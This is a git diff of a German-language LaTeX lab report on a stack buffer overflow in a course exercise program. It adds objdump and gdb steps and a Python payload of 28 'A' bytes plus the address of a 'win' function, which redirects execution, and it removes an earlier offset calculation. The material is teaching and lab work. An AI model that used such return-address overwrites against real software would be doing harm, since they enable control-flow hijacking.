diff --git a/Lab02/documentation/bufferOverflow/bufferOverflow.tex b/Lab02/documentation/bufferOverflow/bufferOverflow.tex index 8cbbca7..00be340 100644 --- a/Lab02/documentation/bufferOverflow/bufferOverflow.tex +++ b/Lab02/documentation/bufferOverflow/bufferOverflow.tex @@ -51,19 +51,12 @@ Zum debuggen wird der Befehl \verb|gdb bufferOverflow| eingegeben. Damit wird de Wenn man den Breakpoint auf \verb|calculate()| setzt, einen schritt über \verb|strcpy(name,text)| macht, bekommt man einen Segmentation fault. -\subsection{Stack} +\subsection{Versuchen zu gewinnen} Hinweis: \verb|"A" ASCII| wird als \verb|0x41| geschrieben. Hinweis: \verb|"B" ASCII| wird als \verb|0x42| geschrieben. -Abstand zwischen name (\verb|0xbffff2a0|) und input (\verb|0xbffff2b4|) sind 20 Byte. Jeder Int belegt 4 Byte auf dem Stack. Somit müsste man \[20 + 6 * 4 Byte = 44 Byte\] mit Zahlen belegen damit man immer gewinnt. - -\begin{verbatim} -argv[1]: AAAAAAAAAAAAAAAA (16 Byte) -+ BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB (44 Byte) -\end{verbatim} - \begin{verbatim} Username: Florian Input1: 1 @@ -71,6 +64,19 @@ Input2: 1 Input3: 1 \end{verbatim} +Speicheraddresse der Zeile 60 herausfinden, in der die Win-Funktion aufgerufen wird: + +\begin{verbatim} +objdump -d ./bufferOverflow | grep win +0x08048807: 80485a4 +\end{verbatim} + +Dann GDB \verb|gdb bufferOverflow| mit folgenden Befehl ausführen + +\verb|r $(python -c " print('A'*28+'\x07\x88\x04\x08')")| + +damit 28x'A' und die Adresse der Win-Funktion als argument der Software mitgegeben wird. + \begin{tabular}{|l|l||r|r|} \hline \multicolumn{2}{|c||}{\textbf{Basic Information}} & \multicolumn{2}{c|}{\textbf{Values at Line}} \\